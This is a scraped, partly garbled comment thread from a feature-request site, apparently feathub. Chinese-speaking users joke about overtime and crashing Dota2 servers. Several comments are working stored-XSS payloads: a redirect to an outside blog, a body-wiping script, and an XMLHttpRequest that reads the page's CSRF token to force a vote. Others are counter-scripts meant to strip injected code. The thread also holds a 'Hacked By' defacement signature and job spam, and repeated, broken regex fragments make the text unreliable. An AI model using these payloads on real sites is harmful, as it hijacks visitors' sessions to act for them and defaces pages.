for(var x of document.getElementsByClassName("body"))
{
if (x.innerHTML.indexOf("script") >= 0)
x.innerHTML = "";
}
反注入补丁
<script> for(var x of document.getElementsByClassName("body"))
{
if (x.innerHTML.indexOf("script") >= 0)
x.innerHTML = "";
}
<script>
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
×
Drag and Drop
The image will be downloaded by Fatkun
LinXueyuanStdio commented almost 2 years ago Admin
mqliutie commented almost 2 years ago
DOTA2服务器总崩... 你们加班咋加的....
aihidao commented almost 2 years ago
二楼容我笑一会儿。。。。。
shen-liang commented almost 2 years ago
| Zatomsmasher commented almost 2 years ago
哈哈哈哈
cowkeys commented almost 2 years ago
来 我们骑士局搞一把
zj972 commented almost 2 years ago
自走棋启动器又双叒叕崩了!!!
OrangeHao2 commented almost 2 years ago
影响我下棋啦!
scorscor commented almost 2 years ago
你们这加班咋加的...dota2服务器整天这么卡
| vale8023 commented almost 2 years ago
就是你们天天加班写bug,才导致大家下棋这么卡的吗?
seuercc commented almost 2 years ago
先不管bug是不是你们写的,你们能先出来道个歉吗?
DengZe1996 commented almost 2 years ago
二楼笑死我了
a18516614541 commented almost 2 years ago
感觉你们加班众望所归啊,哈哈哈
RichardYM commented almost 2 years ago
为什么游戏进行中掉线了就连不上了 你们加班加的少哇
endimirion commented almost 2 years ago
哈哈哈,dota2服务器是真的垃圾啊
| lindianfeng commented almost 2 years ago
天天加班,工资不高
hh44h1144 commented almost 2 years ago
要不是一到晚上服务器就卡,我能连跪十把?
Rephilo commented almost 2 years ago
哈哈,想起了“搜索dota2游戏协调服务器中”
doublejava commented almost 2 years ago
就是加班多导致的。
seiry commented almost 2 years ago
协调服务器是人工加班连的?
netsman1030 commented almost 2 years ago
服务器崩溃取决于服务器的质量和部署问题。不彻底处理加班也没用
ostopuro commented almost 2 years ago
callmeyade commented almost 2 years ago
国服晚上各种崩溃,开着加速去新加坡服务器,新加坡现在也开始连不进去,能不能玩了 ps:有没有主教局
| lihualong0328 commented almost 2 years ago
server总崩,还是加的少。。。
NinnHou commented almost 2 years ago
嗯,还是加的少。(手动滑稽)
BlueTangos commented almost 2 years ago
major比赛服务器都卡,怎么搞的
intrhuting commented almost 2 years ago
美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy
666sbX commented almost 2 years ago
Hacked By Helen收徒QQ925999918
| LinXueyuanStdio commented almost 2 years ago Admin
table{visibility: collapse;}
reinit commented almost 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
reinit commented almost 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Content-Length", "129"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
xss67612 commented almost 2 years ago
document.body.innerText = '';
| LinXueyuanStdio commented almost 2 years ago Admin
img,svg,table{visibility: collapse;}
superzmy commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
ghostlo commented almost 2 years ago
加班写bug吗,,
tezml commented almost 2 years ago
你们加班是真特么不怨
996-ICU-Test-Xs commented almost 2 years ago
for(var x of document.getElementsByTagName('script')) { x.innerHTML = ''}
996-ICU-Test-Xs commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。 × Drag and Drop The image will be downloaded by Fatkun